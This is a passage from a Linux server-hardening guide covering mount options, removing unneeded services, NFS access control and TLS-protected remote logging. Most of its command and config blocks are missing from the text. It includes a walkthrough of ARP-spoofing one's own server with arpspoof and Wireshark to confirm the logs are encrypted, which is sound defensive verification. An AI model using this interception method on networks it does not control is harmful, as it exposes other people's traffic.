Dnscrypt can help conceal DNS queries, but that would be more work. Another offering I’ve used is the bitmask VPN client which does a lot more than traditional VPN clients, bitmask starts an egress firewall that rewrites all DNS packets to use the VPN. bitmask is sponsored by the LEAP Encryption Access Project and looks very good, I’ve used this, and the chaps on the #riseup IRC channel on the indymedia server are really helpful to. Bitmask is working on Debian, Ubuntu, and Mint 17, but not so well on Mint 18 when I tried it, but this will probably change.
All the major hypervisors should provide a way to disable all boot options other than the device you will be booting from. VMware allows you to do this in vSphere Client.
While you are at it, set a BIOS password.
File Permission and Ownership Level
Addressing the first risk as discussed in the “Overly Permissive File Permissions, Ownership and Lack of Segmentation” section of the Identify Risks section:
The first thing to do is locate the files with overly permissive permissions and ownership. Running the suggested tools is a good place to start. From there, following your nose to find any others is a good idea. Then tighten them up so that they conform to the least amount of privilege and ownership necessary in order for the legitimate services/activities to run. Also consider removing any suid
bits on executables chmod u-s <yourfile>
. We also address applying nosuid
to our mounted file systems below which provide a nice safety net.
Mount Point of the File Systems
Addressing the second risk as discussed in the “Overly Permissive File Permissions, Ownership and Lack of Segmentation” section of the Identify Risks section:
Let us get started with your fstab
.
Make a backup of your /etc/fstab
file before you make changes, this is really important, it is often really useful to just swap the modified fstab
with the original as you are progressing through your modifications. Read the man page for fstab and also the options section in the mount man page. The Linux File System Hierarchy (FSH) documentation is worth consulting also for directory usages. The following was my work-flow:
Before you modify and remount /tmp
, view what its currently mounted options look like with:
Add the noexec
mount option to /tmp
but not /var
because executable shell scripts such as *pre[inst, rm]
and *post[inst, rm]
reside within /var/lib/dpkg/info
. You can also add the nodev,nosuid
options to /tmp
.
So you should have the following line in /etc/fstab
now looking like this:
Then to apply the new options from /etc/fstab
:
Then by issuing the sudo mount | grep ' /tmp'
command again, you’ll see your new options applied.
You can add the nodev
option to /home
, /opt
, /usr
and /var
also. You can also add the nosuid
option to /home
. You can add ro
to /usr
So you should have the following lines, as well as the above /tmp
in /etc/fstab
now looking like this:
Before you remount the above changes, you can view the options for the current mounts:
Then remount the mounts you have just specified in your fstab
above:
Now have a look at the changed options applied to your mounts:
You can now bind some target mounts onto existing directories. I had only limited success with this technique, so keep reading. The lines to add to the /etc/fstab
are as per the following. The file system type should be specified as none
(as stated in the “The bind mounts” section of the mount man page. The bind
option binds the mount. There was a bug with the suidperl package in Debian where setting nosuid
created an insecurity. suidperl is no longer available in Debian:
Before you remount the above changes, you can view the options for the current mounts:
Then remount the above immediately, thus taking effect before a reboot, which is the safest way, as if you get the mounts incorrect, your system may fail to boot in some cases, which means you will have to boot a live CD to modify the /etc/fstab
, execute the following commands:
Then to pick up the new options from /etc/fstab
:
Now have a look at the changed options applied to your mounts:
For further details consult the remount option of the mount man page.
At any point you can check the options that you have your directories mounted as, by issuing the following command:
As mentioned above, I had some troubles adding these mounts to existing directories, I was not able to get all options applied, so I decided to take another backup of the VM (I would highly advise you to do the same if you are following along) and run the machine from a live CD (Knoppix in my case). I Ran Disk Usage Analyzer to work out which sub directories of /var
and /usr
were using how much disk space, to work out how much to reduce the sizes of partitions that /var
and /usr
were mounted on, in order to provide that space to sub directories (/var/tmp
, /var/log
and /usr/share
) on new partitions.
Run gparted and unmount the relevant directory from its partition (/var
from /dev/sda5
, and /usr
from /dev/sda8
in this case). Reduce the size of the partitions, by the size of the new partitions you want taken from it. Locate the unallocated partition of the size that you just reduced the partition you were working on, and select new from the context menu. Set the File system type to ext4
and click Add -> Apply All Operations -> Apply. You should now have the new partition.
Now you will need to mount the original partition that you resized and the new partition. Open a terminal with an extra tab. In the left terminal go to where you mounted the original partition (/media/sda5/tmp/
for example), in the right terminal go to where you mounted the new partition (/media/sda11/
for example).
Copy all in current directory of left terminal recursively, preserving all attributes other than hard links.
Once you have confirmed the copy, delete all in /media/sda5/tmp/
Back in gparted, mount /dev/sda1
so we can modify the /etc/fstab
. By running the blkid
command you will be given the UUID for the partition to use in the /etc/fstab
. Modify the /media/sda1/etc/fstab
to look similar to the below sample fstab
. Do the same for /var/log
and /usr/share
.
If you added any of these mounts on the machine while it was running, you could use the following command to mount them all.
Once you have booted into your machine again, you can perform some tests.
Test your noexec
by putting the following script in /var
, and changing the permissions on it:
Copying it to /var/tmp
, and /var/log
, Then try running each of them. You should only be able to run the one that is in the directory mounted without the noexec
option. My file “kimsTest” looks like this:
Try running them:
If you set /tmp
with noexec
and / or /usr
with read-only (ro
), then you will also need to modify or create if it does not exist, the file /etc/apt/apt.conf
and also the referenced directory that apt will write to. The file could look something like the following:
You can spend quite a bit of time experimenting with your mounts and testing. It is well worth locking these down as tightly as you can, make sure you test properly before you reboot, unless you are happy modifying things further via a live CD. This set-up will almost certainly not be perfect for you, there are many options you can apply, some may work for you, some may not. Be prepared to keep adjusting these as time goes on, you will probably find that something can not execute where it is supposed to, or some other option you have applied is causing some trouble. In which case you may have to relax some options, or consider tightening them up more. Good security is always an iterative approach. You can not know today, what you are about to learn tomorrow.
You can also look at enabling a read-only /
mount
Also consider the pros and cons of increasing your shared memory (via /run/shm
) vs not increasing it.
Check out the Additional Resources chapter for extra resources in working with your mounts.
If port mapper is not installed (default on debian web server), we do not need to remove it. Recent versions of Debian will use the portmap
replacement of rpcbind
instead. If you find port mapper is installed, you do not need it on a web server, and if you are hardening a file server, you may require rpcbind
. For example there are two packages required if you want to support NFS on your server: nfs-kernel-server and nfs-common, the latter has a dependency on rpcbind
.
The portmap
service (version 2 of the port mapper protocol) would convert RPC program numbers into TCP/IP (or UDP/IP) protocol port numbers. When an RPC server (such as NFS prior to v4) was started, it would instruct the port mapper which port number it was listening on, and which RPC program numbers it is prepared to serve. When clients wanted to make an RPC call to a given program number, the client would first contact the portmap
service on the server to enquire of which port number its RPC packets should be sent. Rpcbind
which uses version 3 and 4 of the port mapper protocol (called the rpcbind protocol) does things a little differently.
You can also stop portmap
responses by modifying the two below hosts files like so:
but ideally, if you do need the port mapper running, consider upgrading to rpcbind
for starters, then check the rpcbind
section below for countermeasures,
The above changes to the two hosts files would be effective immediately. A restart of the port mapper is not required in this case.
There are further details around the /etc/hosts.[deny & allow]
in the NFS section
This will probably show that Exim4 is currently installed.
If so, before exim4 is disabled, a netstat -tlpn
will produce output similar to the following:
Which shows that exim4 is listening on localhost and it is not publicly accessible. Nmap confirms this, but we do not need it, so lets disable it. You could also use the more modern ss program too. You may also notice monit
and nodejs
listening in these results. Both monit
and our nodejs
application is set-up under the Proactive Monitoring section later in this chapter.
When a run level is entered, init
executes the target files that start with K
, with a single argument of stop, followed with the files that start with S
with a single argument of start. So by renaming /etc/rc2.d/S15exim4
to /etc/rc2.d/K15exim4
you are causing init
to run the service with the stop argument when it moves to run level 2. Just out of interest sake, the scripts at the end of the links with the lower numbers are executed before scripts at the end of links with the higher two digit numbers. Now go ahead and check the directories for run levels 3-5 as well, and do the same. You will notice that all the links in /etc/rc0.d/
(which are the links executed on system halt) start with K
. Is it making sense?
Follow up with another sudo netstat -tlpn
:
And that is all we should see. If you don’t have monit or node running, you won’t see them either of course.
Later on I started receiving errors from apt-get update && upgrade
:
Removing the following packages will solve that:
If Network Information Service (NIS) or the replacement NIS+ is installed, ideally you will want to remove it. If you needed centralised authentication for multiple machines, you could set-up an LDAP server and configure PAM on your machines in order to contact the LDAP server for user authentication. If you are in the cloud, you could look at using the platforms directly service, such as AWS Directory Service. We may have no need for distributed authentication on our web server at this stage.
Check to see if NIS is installed by running the following command:
Nis is not installed by default on a Debian web server, so in this case, we do not need to remove it.
If the host you were hardening had the role of a file server and was running NFS, and you need directory services, then you may need something like Kerberos and/or LDAP. There is plenty of documentation and tutorials on Kerberos and LDAP and replacing NIS with them.
One of the differences between the now deprecated portmap
service and rpcbind
is that portmap
returns port numbers of the server programs and rpcbind returns universal addresses. This contact detail is then used by the RPC client to know where to send its packets. In the case of a web server we have no need for this.
Spin up Nmap:
Because I was using a non default port for SSH, nmap does not announce it correctly, although as shown in the Process and Practises chapter in the Penetration Testing section of Fascicle 0, using service fingerprinting techniques, it is usually easy to find out what is bound to the port. Tools like Unhide will also show you hidden processes bound to hidden ports.
To obtain a list of currently running servers (determined by LISTEN
) on our web server.
or
As per the previous netstat outputs, we see that sunrpc
is listening on a port and was started by rpcbind
with the PID of 1498
. Now Sun Remote Procedure Call is running on port 111
(The same port that portmap
used to listen on). Netstat can tell you the port, but we have confirmed it with the nmap scan above. Rpcbind is used by NFS (as mentioned above, rpcbind
is a dependency of nfs-common) and as we do not need or want our web server to be a NFS file server, we can get rid of the rpcbind
package. If for what ever reason you do actually need the port mapper, then make sure you lock down which hosts/networks it will respond to by modifying the /etc/hosts.deny
and /etc/hosts.allow
as seen in the NFS section.
Shows us that rpcbind
is installed and gives us other details. Now if you have been following along with me and have made the /usr
mount read only, some stuff will be left behind when we try to purge:
Following are the outputs of interest. Now if you have your mounts set-up correctly, you will not see the following errors, if how ever you do see them, then you will need to spend some more time modifying your /etc/fstab
as discussed above:
If you received the above errors, ran the following command again:
Which would yield a result of pH
, that is a desired action of (p)urge and a package status of (H)alf-installed, and want to continue the removal of rpcbind
, try the purge
, dpkg-query
and netstat
command again to make sure rpcbind
is gone and of course no longer listening.
Also you can remove unused dependencies now, after you get the following message:
Because I want to simulate what is going to be removed because I am paranoid and have made stupid mistakes with autoremove years ago, and that pain has stuck with me ever since. I auto-removed a meta-package which depended on many other packages. A subsequent autoremove for packages that had a sole dependency on the meta-package meant they would be removed. Yes it was a painful experience. /var/log/apt/history.log
has your recent apt history. I used this to piece back together my system.
Then follow up with the real thing… Just remove the -s
and run it again. Just remember, the less packages your system has the less code there is for an attacker to exploit.
The port mapper should never be visible from a hostile network, especially the internet. The same goes for all RPC servers due to reflected and often amplified DoS attacks.
You can also stop rpcbind
responses by modifying the two below hosts files like so:
The above changes to the two hosts files would be effective immediately. A restart of the port mapper would not be required in this case.
There are further details around the /etc/hosts.[deny & allow]
files in the NFS section that will help you fine tune which hosts and networks should be permitted to query and receive response from the port mapper. Be sure to check them out if you are going to retain the port mapper, so you do not become a victim of a reflected amplified DoS attack, and that you keep any RPC servers that you may need exposed to your internal clients. You can test this by running the same command that we did in the Identify Risks section.
This time, with the two hosts files set-up as above, the results should look like the following:
You will notice in the response as recorded by Wireshark, that the length is now smaller than the request:
Do not use Telnet for your own systems, SSH provides encrypted shell access and was designed to replace Telnet. Use it instead, there are also many ways you can harden SSH.
Telnet installed?
Telnet gone?
I do not believe there is any place to use FTP, even on a network that you think is safe. The first problem here, if you are still thinking like this, is that the network you think may be safe is a perfect place for someone to exploit, this stems from the Fortress Mentality, as discussed in the Physical and Network chapters.
Ftp installed?
Ftp gone?
Let us take a look at FTPS, SFTP and SCP
FTPS is FTP over TLS with some issues
There were two separate methods to invoke FTPS client security, defined by which port they initiate communications with:
ClientHello
message before any other FTP commands are sent by the client. If the FTPS server does not receive the initial TLS ClientHello
message first, the server should drop the connection.
Implicit also requires that all communications of the FTP session be encrypted.
In order to maintain compatibility with existing FTP clients, implicit FTPS was expected to also listen on the command / control channel using port 990/TCP, and the data channel using port 989/TCP. This left port 21/TCP for legacy no encryption communication. Using port 990 implicitly implied encryption was mandatory.
This is the earlier and mostly considered deprecated method.
This method also allows the FTPS client to decide whether they want to encrypt nothing, encrypt just the command channel (which the credentials are sent over), or encrypt everything.
So as you can see, it is quite conceivable that a user may become confused as to whether encryption is on, is not on, which channel it is applied to and not applied to. The user has to understand the differences between the two methods of invoking security, not invoking it at all, or only on one of the channels.
One thing that you really do not want when it comes to privacy, is confusion. When it comes to SFTP or any protocol over SSH, everything is encrypted, simple as that.
Similar to a web server serving HTTPS with a public key certificate, an FTPS server will also respond with its public key certificate (keeping its private key private). The public key certificate it responds with needs to be generated from a Certificate Authority (CA), whether it is one the server administrator has created (self signed) or a public “trusted” CA (often paid for), the CA (root) certificate must be copied and/or reside locally to the FTPS client. The checksum of the CA (root) certificate will need to be verified also.
If the FTPS client does not already have the CA (root) certificate when the user initiates a connection, the FTPS client should generate a warning due to the fact that the CA (root) certificate is not yet trusted.
This process is quite complicated and convoluted as opposed to how FTP over SSH works.
SFTP is FTP over SSH
As I have already detailed in the section SSH Connection Procedure, the SSH channel is first set-up, thus the client is already authenticated, and their identity is available to the FTP protocol or any protocol wishing to use the encrypted channel. The public key is securely copied from the client to the server out-of-band. If the configuration of SSH is carried out correctly and hardened as I detailed throughout the SSH countermeasures section, the SFTP and any protocol for that matter over SSH has the potential for greater security than those using the Trusted Third Party (TTP) model, which X.509 certificates (utilised in FTPS, HTTPS, OpenVPN, not the less secure IPSec) rely on.
Why is SSH capable of a higher level of security?
With SSH, you copy the public key that you created on your client using ssh-copy-id
to the server. There are no other parties involved. Even if the public key gets compromised, unless the attacker has the private key, which never leaves the client, they can not be authenticated to the server and they can not MItM your SSH session, as that would issue a warning due to the key fingerprint of the MItM no longer matching that in your known_hosts
file. Even if an attacker managed to get near your private key, SSH will not run if the permissions of the ~/.ssh/
directory and files within are to permissive, so the user knows immediately anyway. Even then, if somehow the private key was compromised, the attacker still needs the pass-phrase. SSH is a perfect example of defence in depth.
with X.509 certificates, you rely (trust) on the third party (the CA). When the third party is compromised (as this happens frequently), many things can go wrong, some of which are discussed in the X.509 Certificate Revocation Evolution section of the Network chapter. The compromised CA can start issuing certificates to malicious entities. All that may be necessary at this point is for your attacker to poison your ARP cache if you are relying on IP addresses, or do the same plus poison your DNS. This attack is detailed under the Spoofing Website section in the Network chapter, was demoed at WDCNZ 2015, and also links to a video.
The CA root certificate must be removed from all clients and you will need to go through the process of creating / obtaining a new certificate with a (hopefully) non compromised CA. With SSH, you only have to trust yourself, and I have detailed what you need to know to make good decisions in the SSH section.
SSH not only offers excellent security, but is also extremely versatile.
SCP or Secure Copy leverage’s the security of SSH, and provides simple copy to and from, so once you have SSH set-up and hardened, you are in good stead to be pulling and pushing files around your networks securely with SSH. The SFTP protocol provides remote file system like capabilities, such as remote file deletion, directory listings, resuming of interrupted transfers. If you do not require the additional features of (S)FTP, SCP may be a good option for you. Like SSH, SCP does not have native platform support on Windows, although Windows support is available, and easy enough to set-up, as I have done many times.
Any features that you may think missing by using SCP rather than SFTP are more than made up for simply by using SSH which in itself provides a complete remote Secure SHell and is very flexible as to how you can use it.
Another example is using Rsync over SSH, which is an excellent way to sync files between machines. Rsync will only copy the files that have been changed since the last sync, so this can be extremely quick
For Windows machines, I also run all of my RDP sessions over SSH, see my blog post for further details: https://blog.binarymist.net/2010/08/26/installation-of-ssh-on-64bit-windows-7-to-tunnel-rdp/
So there is no reason to not have all of your inter-machine communications encrypted, whether they be on the internet, or on what you think is a trusted LAN. This is why firewalls are just another layer of defence and nothing more.
You should not need NFS running on a web server. The packages required for the NFS server to be running are nfs-kernel-server, which has a dependency on nfs-common (common to server and clients), which also has a dependency of rpcbind.
NFSv4 (December 2000) no longer requires the portmap service. Rpcbind is the replacement.
Issue the following command to confirm that the NFS server is not installed:
This may show you that you have nfs-common installed, but ideally you do not want nfs-kernel-server installed. If it is you can just:
If you do need NFS running for a file server, the usual files that will need some configuration will be the following:
/etc/exports
(Only file required to actually export your shares)/etc/hosts.allow
/etc/hosts.deny
Check that these files permissions are 644
, owned by root
, with group of root
or sys
.
The above hosts.[allow | deny]
provide the accessibility options. You really need to lock these down if you intend to use NFS in a somewhat secure fashion.
The exports man page has all the details (and some examples) you need, but I will cover some options here.
In the below example /dir/you/want/to/export
is the directory (and sub directories) that you want to share, this could also be an entire volume, but keeping these as small as possible is a good start.
machine1
, machine2
, machinen
are the machines that you want to have access to the spescified exported share. These can be specified as their DNS names or IP addresses, using IP addresses can be a little more secure and reliable than using DNS addresses. If using DNS, make sure the names are fully qualified domain names.
Some of the more important options are:
ro
: The client will not be able to write to the exported share (this is the default), and I do not use rw
which allows the client to also write.root_squash
: This prevents remote root users that are connected from also having root privileges, assigning them the user ID of the nfsnobody
, thus effectively “squashing” the power of the remote user to the lowest privileges possible on the server. Or even better, use all_squash
.nfs-utils
onwards, no_subtree_check
is a default. subtree_check
was the previous default, which would cause a routine to verify that files requested by the client were in the appropriate part of the volume. The subtree_check
caused more issues than it solved.fsid
: is used to specify the file system that is exported, this could be a UUID, or the device number. NFSv4 clients have the ability to see all of the exports served by the NFSv4 server as a single file system. This is called the NFSv4 pseudo-file system. This pseudo-file system is identified as a single, real file system, identified at export with the fsid=0
option.anonuid
and anongid
explicitly set the uid and gid of the anonymous account. This option makes all requests look like they come from a specific user. By default the uid and gid of 65534 is used by exportfs for squashed access. These two options allow us to override the uid and gid values.The following is one of the configs I have used on several occasions:
Then on top of this sort of configuration, you need to make sure that the local server mounts are as restrictive as we set-up in the “Lock Down the Mounting of Partitions” section, and also the file permissions for other, at the exported level recursively, are as restrictive as practical for you. Now we are starting to achieve a little defence in depth.
Now if you have been following along with the NFS configuration because you are working on a file server rather than a web server, lets just take this a little further with some changes to /etc/hosts.deny
and /etc/hosts.allow
.
The access control language used in these two files is the same as each other, just that hosts.deny
is consulted for which entities to deny to which services, and hosts.allow
for which to allow for the same.
Each line of these two files specifies (in the simplest form) a single service or process and a set of hosts in numeric form (not DNS). In the more complex forms, daemon@host and user@host.
You can add ALL:ALL
to your hosts.deny
, but if you install a new service that uses these files, then you will be left wondering why it is not working. I prefer to be more explicit, but it is up to you.
Prior to NFSv4 to achieve the same results, these two files would need to contain something similar to the following. NFSv4 has no interaction with these additional daemons, as their functionality has been incorporated into the version 4 protocol and NFS (v4) listens on the well known TCP port 2049:
You can reload your config, that is re-export your exports /etc/exports
with a restart of NFS:
Although that is not really necessary, a simple
is sufficient. Both exports and exportfs man pages are good for additional insight.
Then run another showmount
to audit your exports:
A client communicates with the servers mount daemon. If the client is authorised, the mount daemon then provides the root file handle of the exported filesystem to the client, at which point the client can send packets referencing the file handle. Making correct guesses of valid file handles can often be easy. The file handles consist of:
/etc/fstab
usually world readable, or by running blkid
)./
directory on the standard Unix filesystem has the inode number of 2, /proc
is 1. You can see these with ls -id <target dir>
/
are not deleted very often, so the count remains small and reasonably guessable. Using a tool istat
can provide these details if you want to have a play.Thus allowing a spoofing type of attack, which has been made more difficult by the following measures:
exportfs
is run with the secure
option, requiring that requests originate from a privileged port (<1024). We can see with the following commands that this is the case, so whoever attempts to mount an export must be root.Or with the newer Socket Statistics:
Prior to this spoofing type vulnerability largely being mitigated, one option that was used was to randomise the generation number of every inode on the filesystem using a tool fsirand
, which was available for some versions of Unix, although not Linux. This made guessing the generation number harder, thus mitigating these spoofing type of attacks. This would usually be scheduled to run say once a month.
fsirand
would be run on the /
directory while in single-user mode
or
on un-mounted filesystems, run fsck
, and if no errors were produced, run fsirand
Some Useful Visibility Commands
Check who is currently logged in to your server and what they are doing:
who
and w
Check who has recently logged into your server, I mentioned this command previously:
last -ad
Check which user has failed login attempts, mentioned this command previously:
lastb -ad
Check the most recent login of all users, or of a given user. lastlog
sources data from the binary file:
/var/log/lastlog
lastlog
I recently performed an in-depth evaluation of a small collection of logging and alerting offerings, the choice of which candidates to bring into the in-depth evaluation came from an initial evaluation.
It is very important to make sure you have reliable and all-encompassing logging to an off-site location. This way attackers will have to also compromise that location in order to effectively cover their tracks.
You can often see in logs when access has been granted to an entity, when files have been modified or removed. Become familiar with what your logs look like and which events create which messages. A good sys-admin can sight logs and quickly see anomalies. If you keep your log aggregator open at least when ever you are working on the servers that generate the events, you will quickly get used to recognising which events cause which log entries.
Alerting events should also be set-up for expected, unexpected actions and a dead man’s snitch.
Make sure you have reviewed who can write and read your logs, especially those created by the auth
facility, and make any modifications necessary to the permissions.
In order to have logs that provide the information you need, you need to make sure the logging level is set to produce the required amount of verbosity. That time stamps are synchronised across your network. That you archive the logs for long enough to be able to diagnose malicious activity and movements across the network.
Being able to rely on the times of events on different network nodes is essential to making sense of tracking an attackers movements through your network. I discuss setting up Network Time Protocol (NTP) on your networked machines in the Network chapter.
~/.swatchrc
and performs any action you can script. You can define different message types with different font styles and colours. Simple Log Watcher can tail the log file, so your actions will be performed in real-time. Each log file you want to monitor, you need a separate swatchrc
file and a separate instance of Simple Log Watcher, as it only takes one file argument. If you want to monitor a lot of log files without aggregating them, this could get messy.
See the Additional Resources chapter.
/etc/logcheck/logcheck.conf
. You can specify which log files to review within the /etc/logcheck/logcheck.logfiles
. Logcheck is easy to install and configure. GNU syslogd
Which I am unsure of whether it is being actively developed. Most GNU/Linux distributions no longer ship with this. Only supports UDP. It is also lacking in features. From what I gather is single-threaded. I did not spend long looking at this as there was not much point. The following two offerings are the main players currently.
Rsyslog
Which ships with Debian and most other GNU/Linux distributions now. I like to do as little as possible to achieve goals, and rsyslog fits this description for me. The rsyslog documentation is good. Rainer Gerhards wrote rsyslog and his blog provides many good insights into all things system logging. Rsyslog Supports UDP, TCP, TLS. There is also the Reliable Event Logging Protocol (RELP) which Rainer created. Rsyslog is great at gathering, transporting, storing log messages and includes some really neat functionality for dividing the logs. It is not designed to alert on logs. That is where the likes of Simple Event Correlator (SEC) comes in, as discussed below. Rainer Gerhards discusses why TCP is not as reliable as many think.
Syslog-ng
I did not spend to long here, as I did not see any features that I needed that were better than the default of rsyslog. Syslog-ng can correlate log messages, both real-time and off-line, supports reliable and encrypted transport using TCP and TLS. message filtering, sorting, pre-processing, log normalisation.
You may have devices in your network topology such as routers, switches, access points (APs) that do not have functionality to send their system logs via TCP, opting to rely on an unreliable transport such as UDP, often also not supporting any form of confidentiality. As this is not directly related to VPS, I will defer this portion to the Insufficient Logging countermeasures section within the Network chapter.
Rsyslog using TCP, local queuing over TLS to papertrail for your syslog collection, aggregating and reporting server. Papertrail does not support RELP, but say that is because their clients have not seen any issues with reliability in using plain TCP over TLS with local queuing. I must have been the first then. Maybe I am the only one that actually compares what is being sent against what is being received.
As I was setting this up and watching both ends. We had an internet outage of just over an hour. At that stage we had very few events being generated, so it was trivial to verify both ends after the outage. I noticed that once the ISPs router was back on-line and the events from the queue moved to papertrail, that there was in fact one missing.
Why did Rainer Gerhards create RELP if TCP with queues was good enough? That was a question that was playing on me for a while. In the end, it was obvious that TCP without RELP is not good enough if you want your logs to have the quality of integrity. At this stage it looks like the queues may loose messages. Rainer Gerhards said “In rsyslog, every action runs on its own queue and each queue can be set to buffer data if the action is not ready. Of course, you must be able to detect that the action is not ready, which means the remote server is off-line. This can be detected with plain TCP syslog and RELP“, so it can be detected without RELP.
You can aggregate log files with rsyslog or by using papertrails remote_syslog
daemon.
Alerting is available, including for inactivity of events.
Papertrails documentation is good and support is reasonable. Due to the huge amounts of traffic they have to deal with, they are unable to trouble-shoot any issues you may have. If you still want to go down the papertrail path, to get started, work through (https://papertrailapp.com/systems/setup) which sets up your rsyslog to use UDP (specified in the /etc/rsyslog.conf
by a single ampersand in front of the target syslog server). I wanted something more reliable than that, so I use two ampersands, which specifies TCP.
As we are going to be sending our logs over the internet for now, we need TLS, check papertrails “Encrypting with TLS” docs. Check papertrails CA server bundle for integrity:
Should result in what ever it says on papertrails “Encrypting with TLS” page. First problem here: the above mentioned page that lists the MD5 checksum is being served unencrypted, even if you force the use of https
I get an invalid certificate error. My advice would be to contact papertrail directly and ask them what the MD5 checksum should be. Make sure it is the same as what the above command produces.
If it is, put the contents of that URL into a file called papertrail-bundle.pem
, then scp
the papertrail-bundle.pem
into the web servers /etc
dir. The command for that will depend on whether you are already on the web server and you want to pull, or whether you are somewhere else and want to push. Then make sure the ownership is correct on the pem file.
install rsyslog-gnutls
:
Add the TLS config:
to your /etc/rsyslog.conf
. Create egress rule for your router to let traffic out to destination port 39871
.
To generate a log message that uses your system syslogd config /etc/rsyslog.conf
, run:
Should log “hi
” to /var/log/messages
and also to https://papertrailapp.com/events, but it was not.
Time to Trouble-shoot
Let us keep an eye on /var/log/messages
, where our log messages should be written to for starters. In one terminal run the following:
OK, so lets run rsyslog in config checking mode:
If the config is OK, the output will look like:
Some of the trouble-shooting resources I found were:
/usr/sbin/rsyslogd -version
will provide the installed version and supported features.The papertrail help was not that helpful, as we do not, and should not have telnet installed, we removed it remember? I can not ping from the DMZ as ICMP egress is not white-listed and I am not going to install tcpdump or strace on a production server. The more you have running, the more surface area you have, the greater the opportunities for exploitation, good for attackers, bad for defenders.
So how do we tell if rsyslogd is actually running if it does not appear to be doing anything useful?
Showing which files rsyslogd has open can be useful:
To start with, produced output like:
Which obviously showed rsyslogds SYN
packets were not getting through. I had some discussion with Troy from papertrail support around the reliability of plain TCP over TLS without RELP. I think if the server is business critical, then Improving the Strategy maybe required. Troy assured me that they had never had any issues with logs being lost due to lack of reliability with out RELP. Troy also pointed me to their recommended local queue options. After adding the queue tweaks and a rsyslogd restart, the above command now produced output like:
I could now see events in the papertrail web UI in real-time.
Socket Statistics (ss
) (the better netstat
) should also show the established connection.
By default papertrail accepts TCP over TLS (TLS encryption check-box on, Plain text check-box off) and UDP. So if your TLS is not set-up properly, your events will not be accepted by papertrail. This is how I confirmed this to be true:
Confirm that our Logs are Commuting over TLS
Now without installing anything on the web server or router, or physically touching the server sending packets to papertrail, or the router. Using a switch (ubiquitous) rather than a hub. No wire tap or multi-network interfaced computer. No switch monitoring port available on expensive enterprise grade switches (along with the much needed access). I was basically down to two approaches I could think of, and I like to achieve as much as possible with as little amount of effort as possible, so could not be bothered getting out of my chair and walking to the server rack.
On our MItM box, I set a static IP
: address
, netmask
, gateway
in /etc/network/interfaces
and add domain
, search
and nameservers
to the /etc/resolv.conf
.
Follow that up with a service network-manager restart
.
On the web server, run: ifconfig -a
to get MAC: <your server MAC>
.
On MItM box, run the same command, to get MAC: <MItM box MAC>
.
On web server, run: ip neighbour
to find MAC addresses associated with IP addresses (the local ARP table). Router will be: <router MAC>
.
Now you need to turn your MItM box into a router temporarily. On the MItM box run:
If forwarding is on, You will see a 1
. If it is not, add a 1
into the file:
and check again to make sure forwarding is on. Now on the MItM box run:
This will continue to notify <your server IP>
that our MItM box MAC address belongs to <router IP>
. For all intents and purposes, we (MItM box) are now <router IP>
to the <your server IP>
box, but our IP address does not change. Now on the web server you can see that its ARP table has been updated and because arpspoof
keeps running, it keeps telling <your server IP>
that our MItM box is the router.
Now on our MItM box, while our arpspoof
continues to run, we start Wireshark listening on our eth0
interface or what ever interface you are bound to, and you can see that all packets that the web server is sending, we are intercepting and forwarding (routing) on to the gateway.
Now Wireshark clearly showed that the data was encrypted. I commented out the five TLS config lines in the /etc/rsyslog.conf
file -> saved -> restarted rsyslog -> turned on “Plain text” in papertrail and could now see the messages in clear text. Now when I turned off “Plain text”, papertrail would no longer accept syslog events. Excellent!
One of the nice things about arpspoof
is that it re-applies the original ARP mappings once it is done.
You can also tell arpspoof
to poison the routers ARP table. This way any traffic going to the web server via the router, not originating from the web server will be routed through our MItM box also.
Do not forget to revert the change to /proc/sys/net/ipv4/ip_forward
.
Exporting Wireshark Capture
You can use the File->Save As… option here for a collection of output types, or the way I usually do it is:
Trouble-shooting Messages that papertrail Never Shows
Check to see which arguments get passed into rsyslogd to run as a daemon in /etc/init.d/rsyslog
and /etc/default/rsyslog
. You will probably see a RSYSLOGD_OPTIONS=""
. There may be some arguments between the quotes.
The debug log can be quite useful for trouble-shooting. Also keep your eye on the stderr as you can see if it is writing anything out (most system start-up scripts throw this away). Once you have finished collecting log: [CTRL]+[C]
To see if rsyslog is running:
The stats it produces show when you run into errors with an output, and also the state of the queues. You can also run impstats on the receiving machine if it is in your control. Papertrail obviously is not. Put the following into your rsyslog.conf
file at the top and restart rsyslog:
Now if you get an error like:
You can just change the /dev/xconsole
to /dev/console
. Xconsole is still in the config file for legacy reasons, it has not been cleaned up by the package maintainers.
By running rsyslogd manually in debug mode, I found an error when the message failed to send:
Standard Error when running rsyslogd manually produces:
With some help from the GnuTLS mailing list:
“That means that send() returned -1 for some reason.” You can enable more output by adding an environment variable GNUTLS_DEBUG_LEVEL=9
prior to running the application, and that should at least provide you with the errno
. This does not provide any more detail to stderr. However, thanks to Rainer we do now have debug.gnutls parameter in the rsyslog code, that if you specify this global variable in the rsyslog.conf
and assign it a value between 0-10 you will have gnutls debug output going to rsyslog’s debug log.
With the above strategy, I had issues where messages were getting lost between rsyslog and papertrail, I spent over a week trying to find the cause. As the sender, you have no insight into what papertrail is doing. The support team could not provide much insight into their service when I had to trouble-shoot things. They were as helpful as they could be though.
Reliability can be significantly improved by using RELP. Papertrail does not support RELP, so a next step could be to replace papertrail with a local network instance of an rsyslogd collector and Simple Event Correlator (SEC). Notification for inactivity of events could be performed by cron and SEC. Then for all your graphical event correlation, you could use LogAnalyzer, also created by Rainer Gerhards (rsyslog author). This would be more work to set-up than an on-line service you do not have to set-up. In saying that. You would have greater control and security which for me is the big win here. Normalisation also from Rainer could be useful.
Another option instead of going through all the work of having to set-up and configure a local network instance of an rsyslogd collector, SEC and perhaps LogAnalyzer, would be to just deploy the SyslogAppliance which is a turn-key VM already configured with all the tools you would need to collect, aggregate, report and alert, as discussed in the Network chapter under Countermeasures, Insufficient Logging.
What I found, is that after several upgrades to rsyslog, the reliability issues seemed to improve, making me think that changes to rsyslog were possibly and probably responsible.
I recently performed an in-depth evaluation of a collection of tools, that one of their responsibilities was monitoring and performing actions on your processes and applications based on some other event(s). Some of these tools are very useful for security focussed tasks as well as generic dev-ops.
New Relic
New Relic is a Software as a Service (SaaS) provider that offers many products, primarily in the performance monitoring space, rather than security. Their offerings cost money, but may come into their own in larger deployments. I have used New Relic, it has been quick to start getting useful performance statistics on servers and helped my team isolate resource constraints.
Advanced Web Statistics (AWStats)
Unlike NewRelic which is SaaS, AWStats is FOSS. It kind of fits a similar market space as NewRelic though. You can find the documentation
here: http://www.awstats.org/docs/index.html.
Pingdom
Similar to New Relic but not as feature rich. As discussed below, Monit is a better alternative.
